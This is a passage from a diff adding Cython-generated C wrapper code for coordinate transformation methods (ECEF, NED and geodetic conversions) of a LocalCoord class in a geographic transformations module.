__Pyx_RefNannySetupContext("from_ecef (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ecef,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 145, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "from_ecef") < 0)) __PYX_ERR(0, 145, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_ecef = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("from_ecef", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 145, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.from_ecef", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_4from_ecef(((PyTypeObject*)__pyx_v_cls), __pyx_v_ecef); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_4from_ecef(PyTypeObject *__pyx_v_cls, PyObject *__pyx_v_ecef) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("from_ecef", 0); + + /* "common/transformations/transformations.pyx":147 + * @classmethod + * def from_ecef(cls, ecef): + * return cls(ecef=ecef) # <<<<<<<<<<<<<< + * + * def ecef2ned_single(self, ecef): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_ecef, __pyx_v_ecef) < 0) __PYX_ERR(0, 147, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_v_cls), __pyx_empty_tuple, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":145 + * return cls(geodetic=geodetic) + * + * @classmethod # <<<<<<<<<<<<<< + * def from_ecef(cls, ecef): + * return cls(ecef=ecef) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.from_ecef", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":149 + * return cls(ecef=ecef) + * + * def ecef2ned_single(self, ecef): # <<<<<<<<<<<<<< + * assert self.lc + * cdef ECEF e = list2ecef(ecef) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single = {"ecef2ned_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_7ecef2ned_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ecef = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ecef2ned_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ecef,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 149, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ecef2ned_single") < 0)) __PYX_ERR(0, 149, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_ecef = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ecef2ned_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 149, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ecef2ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_6ecef2ned_single(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v_ecef); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_6ecef2ned_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_ecef) { + struct ECEF __pyx_v_e; + struct NED __pyx_v_n; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + struct ECEF __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ecef2ned_single", 0); + + /* "common/transformations/transformations.pyx":150 + * + * def ecef2ned_single(self, ecef): + * assert self.lc # <<<<<<<<<<<<<< + * cdef ECEF e = list2ecef(ecef) + * cdef NED n = self.lc.ecef2ned(e) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_self->lc != 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 150, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 150, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":151 + * def ecef2ned_single(self, ecef): + * assert self.lc + * cdef ECEF e = list2ecef(ecef) # <<<<<<<<<<<<<< + * cdef NED n = self.lc.ecef2ned(e) + * return [n.n, n.e, n.d] + */ + __pyx_t_2 = __pyx_f_6common_15transformations_15transformations_list2ecef(__pyx_v_ecef); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L1_error) + __pyx_v_e = __pyx_t_2; + + /* "common/transformations/transformations.pyx":152 + * assert self.lc + * cdef ECEF e = list2ecef(ecef) + * cdef NED n = self.lc.ecef2ned(e) # <<<<<<<<<<<<<< + * return [n.n, n.e, n.d] + * + */ + __pyx_v_n = __pyx_v_self->lc->ecef2ned(__pyx_v_e); + + /* "common/transformations/transformations.pyx":153 + * cdef ECEF e = list2ecef(ecef) + * cdef NED n = self.lc.ecef2ned(e) + * return [n.n, n.e, n.d] # <<<<<<<<<<<<<< + * + * def ned2ecef_single(self, ned): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_n.n); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_n.e); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_n.d); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 153, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":149 + * return cls(ecef=ecef) + * + * def ecef2ned_single(self, ecef): # <<<<<<<<<<<<<< + * assert self.lc + * cdef ECEF e = list2ecef(ecef) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ecef2ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":155 + * return [n.n, n.e, n.d] + * + * def ned2ecef_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single = {"ned2ecef_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_9ned2ecef_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ned = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ned2ecef_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_ned,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ned)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 155, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ned2ecef_single") < 0)) __PYX_ERR(0, 155, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_ned = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ned2ecef_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 155, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned2ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_8ned2ecef_single(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v_ned); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_8ned2ecef_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_ned) { + struct NED __pyx_v_n; + struct ECEF __pyx_v_e; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + struct NED __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ned2ecef_single", 0); + + /* "common/transformations/transformations.pyx":156 + * + * def ned2ecef_single(self, ned): + * assert self.lc # <<<<<<<<<<<<<< + * cdef NED n = list2ned(ned) + * cdef ECEF e = self.lc.ned2ecef(n) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_self->lc != 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 156, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 156, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":157 + * def ned2ecef_single(self, ned): + * assert self.lc + * cdef NED n = list2ned(ned) # <<<<<<<<<<<<<< + * cdef ECEF e = self.lc.ned2ecef(n) + * return [e.x, e.y, e.z] + */ + __pyx_t_2 = __pyx_f_6common_15transformations_15transformations_list2ned(__pyx_v_ned); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 157, __pyx_L1_error) + __pyx_v_n = __pyx_t_2; + + /* "common/transformations/transformations.pyx":158 + * assert self.lc + * cdef NED n = list2ned(ned) + * cdef ECEF e = self.lc.ned2ecef(n) # <<<<<<<<<<<<<< + * return [e.x, e.y, e.z] + * + */ + __pyx_v_e = __pyx_v_self->lc->ned2ecef(__pyx_v_n); + + /* "common/transformations/transformations.pyx":159 + * cdef NED n = list2ned(ned) + * cdef ECEF e = self.lc.ned2ecef(n) + * return [e.x, e.y, e.z] # <<<<<<<<<<<<<< + * + * def geodetic2ned_single(self, geodetic): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_e.x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_e.y); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_e.z); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":155 + * return [n.n, n.e, n.d] + * + * def ned2ecef_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned2ecef_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":161 + * return [e.x, e.y, e.z] + * + * def geodetic2ned_single(self, geodetic): # <<<<<<<<<<<<<< + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single = {"geodetic2ned_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_11geodetic2ned_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_geodetic = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("geodetic2ned_single (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_geodetic,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_geodetic)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 161, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "geodetic2ned_single") < 0)) __PYX_ERR(0, 161, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_geodetic = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("geodetic2ned_single", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 161, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.geodetic2ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_10geodetic2ned_single(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v_geodetic); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_10geodetic2ned_single(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_geodetic) { + struct Geodetic __pyx_v_g; + struct NED __pyx_v_n; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + struct Geodetic __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("geodetic2ned_single", 0); + + /* "common/transformations/transformations.pyx":162 + * + * def geodetic2ned_single(self, geodetic): + * assert self.lc # <<<<<<<<<<<<<< + * cdef Geodetic g = list2geodetic(geodetic) + * cdef NED n = self.lc.geodetic2ned(g) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_self->lc != 0); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 162, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 162, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":163 + * def geodetic2ned_single(self, geodetic): + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) # <<<<<<<<<<<<<< + * cdef NED n = self.lc.geodetic2ned(g) + * return [n.n, n.e, n.d] + */ + __pyx_t_2 = __pyx_f_6common_15transformations_15transformations_list2geodetic(__pyx_v_geodetic); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 163, __pyx_L1_error) + __pyx_v_g = __pyx_t_2; + + /* "common/transformations/transformations.pyx":164 + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) + * cdef NED n = self.lc.geodetic2ned(g) # <<<<<<<<<<<<<< + * return [n.n, n.e, n.d] + * + */ + __pyx_v_n = __pyx_v_self->lc->geodetic2ned(__pyx_v_g); + + /* "common/transformations/transformations.pyx":165 + * cdef Geodetic g = list2geodetic(geodetic) + * cdef NED n = self.lc.geodetic2ned(g) + * return [n.n, n.e, n.d] # <<<<<<<<<<<<<< + * + * def ned2geodetic_single(self, ned): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_n.n); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_n.e); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyFloat_FromDouble(__pyx_v_n.d); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = PyList_New(3); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_6, 0, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_6, 1, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_5); + PyList_SET_ITEM(__pyx_t_6, 2, __pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_5 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":161 + * return [e.x, e.y, e.z] + * + * def geodetic2ned_single(self, geodetic): # <<<<<<<<<<<<<< + * assert self.lc + * cdef Geodetic g = list2geodetic(geodetic) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.geodetic2ned_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":167 + * return [n.n, n.e, n.d] + * + * def ned2geodetic_single(self, ned): # <<<<<<<<<<<<<< + * assert self.lc + * cdef NED n = list2ned(ned) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single = {"ned2geodetic_single", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_13ned2geodetic_single(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ned = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + 